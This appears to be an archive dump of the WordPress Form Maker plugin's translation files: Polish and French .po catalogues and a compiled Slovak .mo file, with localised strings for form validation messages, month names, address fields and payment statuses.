msgstr "Błąd, plik nie może być przeniesiona."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr "To pole %s wymaga unikalną pozycję i wartość ta została już złożone."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Błąd, e-mail nie został wysłany."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nic nie zostało złożone."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Formularz został przesłany pomyślnie."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Błąd, e-mail nie został wysłany."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Twój adres e-mail jest już sprawdzone."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Twój e-mail został pomyślnie zweryfikowany."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Twój e-mail weryfikacji Upłynął limit czasu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Link Weryfikacja jest nieprawidłowy."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "Pole jest wymagane."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "To nie jest prawidłowy adres email."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr "Nie można wybrać byłych termin. Wybierz datę, od obecnego."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "The"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "Wartość musi być między"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Ilość"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Twój wynik powinien być niższy niż "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Stanowisko/Funkcja"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "Pierwszy"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Ostatni"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Środkowy"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Numer kierunkowy"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr ""
"(Phone Number) Numer telefonu: __________________________________________"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dolarów"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Centów"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Od"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Na"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "przejdź "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "zresetować "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Wybierz pole"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Wybierz datę"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-sk_SK.mo000060400000007166152434416630012217 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A
H
U
\
c
i
q
z
�
(�
&�
�
�
�

$*/8OXat	�	��
�	�@�$3%7M]&����G�(D
$m
�
(�
G�
&#J\4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:03+0400
PO-Revision-Date: 2015-05-22 17:04+0400
Last-Translator: 
Language-Team: 
Language: sk
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprílKód oblastiAugustCentovMestoKrajinaDecemberDolárovChyba, bol e-mail neposlal.Chyba môže súbor nemožno presunúť.Chyba, nesprávny bezpečnostný kód.FebruárMenoOdísť JanuárJúlJúnPriezviskoMarecMájStrednáNič bol predložený.NovemberOktóberTelefónne čísloPoštové / PSČMnožstvoobnoviť Vyberte dátumVyberte pole SeptemberJe nám ľúto, ale nemáte možnosť nahrať tento typ súboru.Štát / provincia / regiónUlicaUlica riadok 2TheSúboru presiahne povolenú veľkosťToto pole %s vyžaduje jedinečný prístup a táto hodnota bola už podaná.Toto nie je platná e-mailová adresa.NázovPreOverovací odkaz je neplatný.Nemôžete vybrať bývalej termín. Vyberte dátum počnúc aktuálne.Vaša e-mailová adresa je už overená.Váš e-mail bol úspešne overený.Váš e-mail overenie vypršal.Váš formulár bol úspešne odoslaný.Vaša IP je na čiernej listine. Prosím, obráťte sa na správcu webuVaše skóre by mala byť menšia ako pole je povinné.hodnota musí byť medzi languages/form_maker-fr_FR.po000060400000057071152434416630012206 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 16:55+0400\n"
"PO-Revision-Date: 2015-05-22 16:55+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: fr\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Adresse 1"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Adresse 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Ville"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Province"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Code postal / Zip"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Pays"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Janvier"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "février"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "mars"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Avril"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mai"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "juin"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Juillet"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "août"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Septembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "octobre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "novembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Décembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Erreur, le code de sécurité incorrect."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Votre ip est blacklisté. S'il vous plaît contactez l'administrateur du site. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Le fichier dépasse la taille autorisée des"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Désolé, vous n'êtes pas autorisé à télécharger ce type de fichier."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Erreur, le fichier ne peut pas être déplacé."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Ce champ %s nécessite une entrée unique et cette valeur a déjà été soumis."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Erreur, e-mail n'a pas été envoyé."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Rien n'a été soumis."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Votre formulaire a été soumis avec succès."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Erreur, e-mail n'a pas été envoyé."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Votre adresse e-mail est déjà vérifiée."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Votre email a été vérifiée avec succès."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
